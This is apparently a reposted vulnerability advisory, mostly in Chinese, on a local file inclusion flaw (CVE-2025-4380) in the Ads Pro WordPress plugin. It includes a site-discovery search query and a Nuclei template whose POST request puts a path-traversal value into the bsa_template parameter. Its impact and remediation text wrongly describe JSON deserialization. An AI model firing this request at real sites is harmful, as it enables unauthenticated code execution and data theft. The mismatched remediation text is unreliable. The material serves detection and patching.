Ads Pro Plugin Local File Inclusion Vulnerability

漏洞信息

漏洞名称: Ads Pro Plugin Local File Inclusion Vulnerability

漏洞编号:

  • CVE: CVE-2025-4380

漏洞类型: 文件包含

漏洞等级: 严重

漏洞描述: Ads Pro Plugin是WordPress的一个多功能广告管理插件,广泛应用于需要广告管理的WordPress网站。该插件在版本4.89及之前的所有版本中,存在一个本地文件包含漏洞,攻击者可以通过bsa_template参数在bsa_preview_callback函数中实现任意文件包含。这一漏洞的根源在于对用户输入的不当处理,导致攻击者可以包含并执行服务器上的任意文件,包括PHP文件,从而可能绕过访问控制、获取敏感数据或执行任意代码。由于该漏洞允许未认证的攻击者利用,且影响范围广泛,其严重性被评定为严重。攻击者可以利用此漏洞在受影响的系统上执行任意代码,导致数据泄露、服务中断或其他恶意活动。为了防范此漏洞,建议用户将Ads Pro Plugin更新至4.89之后的版本,或者禁用多态类型处理,实施适当的输入验证和反序列化控制。

产品厂商: scripteo

产品名称: Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager

影响版本: <= 4.89

搜索语法: body=”/wp-content/plugins/ap-plugin-scripteo”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/994186152f2ad6fc9e1c7ebe75e6d4bfcd0a3b66/http%2Fcves%2F2025%2FCVE-2025-4380.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

id: CVE-2025-4380

info:
  name: Ads Pro Plugin <= 4.89 - Local File Inclusion
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.89 via the 'bsa_template' parameter of the `bsa_preview_callback` function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases .php files can can be uploaded and included, or already exist on the site.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary code on the affected system through deserialization of malicious JSON payloads.
  remediation: |
    Update the Ads Pro Plugin to version later than 4.89. Alternatively, disable polymorphic type handling or implement proper input validation and deserialization controls.
  reference:
    - https://wpscan.com/vulnerability/63964564-73e6-45e2-8145-33e2e30d1d57/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4380
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-4380
    cwe-id: CWE-98
    cpe: cpe:2.3:a:scripteo:ads_pro:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: scripteo
    product: ads_pro
    fofa-query: body="/wp-content/plugins/ap-plugin-scripteo"
  tags: cve,cve2025,wp,wordpress,wp-plugin,lfi,scripteo,ads-pro

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=bsa_preview_callback&bsa_template=../php/example

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'Example PHP Ad')"
          - "contains(content_type, 'text/html')"
          - "status_code == 200"
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #文件包含
Ads Pro Plugin Local File Inclusion Vulnerability
http://example.com/2025/07/09/github_1586193879/
作者
lianccc
发布于
2025年7月9日
许可协议